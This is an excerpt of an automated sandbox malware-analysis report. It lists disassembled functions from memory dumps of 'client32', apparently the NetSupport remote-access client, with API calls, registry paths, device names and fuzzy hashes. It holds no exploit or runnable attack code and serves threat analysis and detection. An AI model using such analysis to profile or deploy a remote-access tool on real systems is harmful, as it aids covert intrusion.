                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp
                                                                                                                                                    • API String ID: 2803934178-2363596943
                                                                                                                                                    • Opcode ID: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                                                                                                    • Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
                                                                                                                                                    • Opcode Fuzzy Hash: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                                                                                                    • Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
                                                                                                                                                    Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                                                                    • String ID: \\.\NSWFPDrv
                                                                                                                                                    • API String ID: 3498533004-85019792
                                                                                                                                                    • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                                                    • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                                                                                                    • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                                                    • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                                                                                                    Function 1115CCA0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _calloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1679841372-0
                                                                                                                                                    • Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                                                                                    • Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
                                                                                                                                                    • Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                                                                                    • Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
                                                                                                                                                    Function 6CA88FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 6CA88FE4
                                                                                                                                                    • getsockname.WSOCK32(?,?,00000010,?,03822CB0,?), ref: 6CA89005
                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,00000010,?,03822CB0,?), ref: 6CA8902E
                                                                                                                                                      • Part of subcall function 6CA85840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6CA88F91,00000000,00000000,6CACB8DA,?,00000080), ref: 6CA85852
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3066294524-0
                                                                                                                                                    • Opcode ID: ca258ef8dd26ff895d3468f0b1e9e6e064557f9b0f05879e6df3df997b131643
                                                                                                                                                    • Instruction ID: 2c03d40860714fb976b76981e69c0cb60393fc8942414ea7429117c9f2334f34
                                                                                                                                                    • Opcode Fuzzy Hash: ca258ef8dd26ff895d3468f0b1e9e6e064557f9b0f05879e6df3df997b131643
                                                                                                                                                    • Instruction Fuzzy Hash: 3D112172E00109AFDB04DFA9D9419FEB7B8EF49214F00456AED09E7240E771AE598B91
                                                                                                                                                    Function 11112140 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 11112185
                                                                                                                                                      • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                                                                                                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1847508633-0
                                                                                                                                                    • Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                                                                                    • Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
                                                                                                                                                    • Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                                                                                    • Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5
                                                                                                                                                    Function 1109EE00 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                                                                                      • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                                                                                      • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                                                                                      • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                                                                                      • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,00E73DD0,?,00000001,00000001), ref: 1109EDC3
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2256153495-0
                                                                                                                                                    • Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                                                                                    • Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
                                                                                                                                                    • Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                                                                                    • Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50
                                                                                                                                                    Function 11110430 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111F1908,1EF76653,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                                                                                                    • EnterCriticalSection.KERNEL32(111F1908,1EF76653,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3991485460-0
                                                                                                                                                    • Opcode ID: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                                                                                    • Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
                                                                                                                                                    • Opcode Fuzzy Hash: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                                                                                    • Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0
                                                                                                                                                    Function 11069480 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID: ??CTL32.DLL
                                                                                                                                                    • API String ID: 1029625771-2984404022
                                                                                                                                                    • Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                                                                                    • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                                                                                                    • Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                                                                                    • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                                                                                                    Function 6CA85840 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • inet_ntoa.WSOCK32(00000080,?,00000000,?,6CA88F91,00000000,00000000,6CACB8DA,?,00000080), ref: 6CA85852
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: inet_ntoa
                                                                                                                                                    • String ID: gfff
                                                                                                                                                    • API String ID: 1879540557-1553575800
                                                                                                                                                    • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                                                                    • Instruction ID: 3e49a66ef38e64521bd68afd9a511928bd6d3c3796347e6f8a24a0eafb7d9be8
                                                                                                                                                    • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                                                                    • Instruction Fuzzy Hash: 3C11AB226092D78BD3028A2EA8642D6BFD9DF86240F1C456ADCCACB701C211D84AC7D0
                                                                                                                                                    Function 110271A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DriveType
                                                                                                                                                    • String ID: ?:\
                                                                                                                                                    • API String ID: 338552980-2533537817
                                                                                                                                                    • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                                                                    • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                                                                                                    • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                                                                    • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                                                                                                    Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
